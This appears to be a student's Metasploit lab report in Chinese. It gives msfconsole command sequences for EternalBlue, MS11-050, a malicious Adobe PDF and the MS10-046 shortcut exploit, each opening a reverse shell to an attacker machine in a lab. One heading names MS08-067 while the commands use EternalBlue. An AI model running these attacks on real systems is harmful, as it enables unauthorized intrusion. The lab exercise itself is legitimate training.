• 2018-2019 20165221 网络对抗 Exp5 MSF基础


    2018-2019 20165221 网络对抗 Exp5 MSF基础

    实践内容:

    • 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
      1. 一个主动攻击实践,如ms08_067; (1分
      2. 一个针对浏览器的攻击,如ms11_050;(1分)
      3. 一个针对客户端的攻击,如Adobe;(1分)
      4. 成功应用任何一个辅助模块。(0.5分)

    具体实验操作

    • 攻击机(kali):192.168.194.128
    • 靶机(win7):192.168.194.129

    任务一:主动攻击实践

    Windows服务渗透攻击——MS08-067安全漏洞

    • 在攻击机的kali中输入
    msfconsole
    

    依次输入以下指令:

    
        msf > use exploit/windows/smb/ms17_010 eternablue
        msf exploit(windows/smb/ms17_010_eternablue) > show payloads
        msf exploit(windows/smb/ms17_010_eternablue) > set payload generic/shell_reverse_tcp //tcp反向回连
        msf exploit(windows/smb/ms17_010_eternablue) > set LHOST 192.168.194.128 //攻击机ip
        msf exploit(windows/smb/ms17_010_eternablue) > set LPORT 5221 //攻击端口
        msf exploit(windows/smb/ms17_010_eternablue) > set RHOST 192.168.194.129 //靶机ip,特定漏洞端口已经固定
        msf exploit(windows/smb/ms17_010_eternablue) > set target 0 //自动选择目标系统类型,匹配度较高
        msf exploit(windows/smb/ms17_010_eternablue) > exploit //攻击
    
    
    • 查询信息
      image

    • 建立会话成功,成功结果如下

    • 设置监听信息

    • 渗透成功!

    任务二:浏览器渗透攻击——MS11-050

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    
        msf > use windows/browser/ms11_050_mshtml_cobjectelement
        msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
        msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.194.128 //攻击机ip
        msf exploit(ms11_050_cobjectelement) > set LPORT 5221 //攻击端口固定
        msf exploit(ms11_050_cobjectelement) > set URIPATH 2016tx //统一资源标识符路径设置
        msf exploit(ms11_050_cobjectelement) > exploit
    
    
    • 设置监听信息

    • 接着在win7靶机中打开浏览器,进入自己刚刚确定的网页 http://192.168.194.128:8080/2016tx

    • 查看自己刚刚生成的网页

    • 嗯.....直接被杀,连网页都无法打开,渗透攻击失败

    任务三:针对客户端的攻击

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
        msf > use windows/fileformat/adobe_cooltype_sing
        msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
        msf exploit(adobe_cooltype_sing) > set LHOST 192.168.194.128 //攻击机ip
        msf exploit(adobe_cooltype_sing) > set LPORT 5303 //攻击端口
        msf exploit(adobe_cooltype_sing) > set FILENAME 20165221.pdf //设置生成pdf文件的名字
        msf exploit(adobe_cooltype_sing) > exploit //攻击
    
    • 生成PDF文件20165221.pdf

    • 将生成的PDF文件拷贝到靶机win7中。

    • 在攻击机(kali)中设置监听模块

        msf > use exploit/multi/handler //进入监听模块
        msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
        msf exploit(handler) > set LHOST 192.168.194.128 //攻击机ip
        msf exploit(handler) > set LPORT 5221 //攻击端口固定
        msf exploit(handler) > exploit
    
    
    • 设置监听模块
    • 在win7的靶机中打开20165221.pdf
    • 在攻击机中进行攻击,即可获得win7机的权限

    任务四:针对快捷方式图表漏洞的攻击

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
        msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
        msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.194.128 //攻击机ip
        msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
        msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.194.128 //攻击机ip
        msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击
    
    • 进入控制台输入指令

    • 在win7靶机上浏览刚刚在kali中得到的网页http://192.168.194.128,并在弹出的安全框中选择允许

    • 接着会进入一个文件夹,点开里面的快捷方式

    • 然后返回攻击机(kali)界面,会发现攻击机正在悄悄地连接靶机,试图建立会话

    • 尝试输入shell,即可渗透成功
      image

    • 而且即便靶机关闭网页,攻击机仍可控制并继续攻击靶机

    辅助模块

    • ipidseq:扫描网段中的存活ip,识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
    • 输入show auxiliary查看所有辅助模块,并输入use scanner/ip/ipidseq选择攻击模块
    • 输入show options指令查看相关信息
    • 设置监听信息,进行攻击!

    基础知识问答:

    用自己的话解释以下三个概念

    • exploit : 字面意思为开发开拓,为自己谋得利益,我理解的应该是利用一切因有的手段,获得管理员权限,从而控制整个网站,具体到MSF中,就是负责将降攻击的代码送到靶机中,达到自己的目的。
    • payload :是一段代码,用于渗透之后在目标主机上执行,是实现病毒有害功能的部分
    • encode :其本意为代码,在这里应该是用来对payload进行编码,主要是为了避免坏字符和实现免杀的功能。

    实验总结

      可能是自己这几次上课都认真听讲了还是怎么回事儿,这次的实验做的比较顺利,遇到的主要问题还是虚拟机,这周又崩溃了一次,还好我的vmware的安装包没有删,重新又装了一遍,嘻嘻嘻。而且自己的这次渗透攻击也并不是全都能成功。而最后的图标攻击渗透,是引诱靶机登录攻击机设置好的网站,最可怕的是,即使靶机后来关闭了该网站,攻击机仍然可以继续控制靶机。
    

    离实战还缺些什么技术或步骤?

    • 我觉得还差得挺远的吧,毕竟有些漏洞已经被修复了,这次实验的难度主要在寻找到合适的模块,进行攻击,做黑客攻击还是挺不容易的......还有就是对指令不太熟悉吧。
  • 相关阅读:
    夫妻合伙创业,度过艰苦的时期,酒楼生意蒸蒸日上
    搬运工做起了石头生意,他的石雕产品深受喜爱
    都市白领开毛衣店,仅一年时间收入20万元
    高中生下海创业,几十年来他始终将家乡的利益放在首位
    白手起家的他,创立公司,身价达到数千万
    从搬砖工到亿万富豪,这些年他经历了什么?
    货车司机创业做物流,他只为赢得老百姓的口碑
    患难夫妻做服装,他们的公司在全国做出了名堂
    struts2注解的作用
    struts2注解的作用
  • 原文地址:https://www.cnblogs.com/0630tx/p/10741692.html
Copyright © 2020-2023  润新知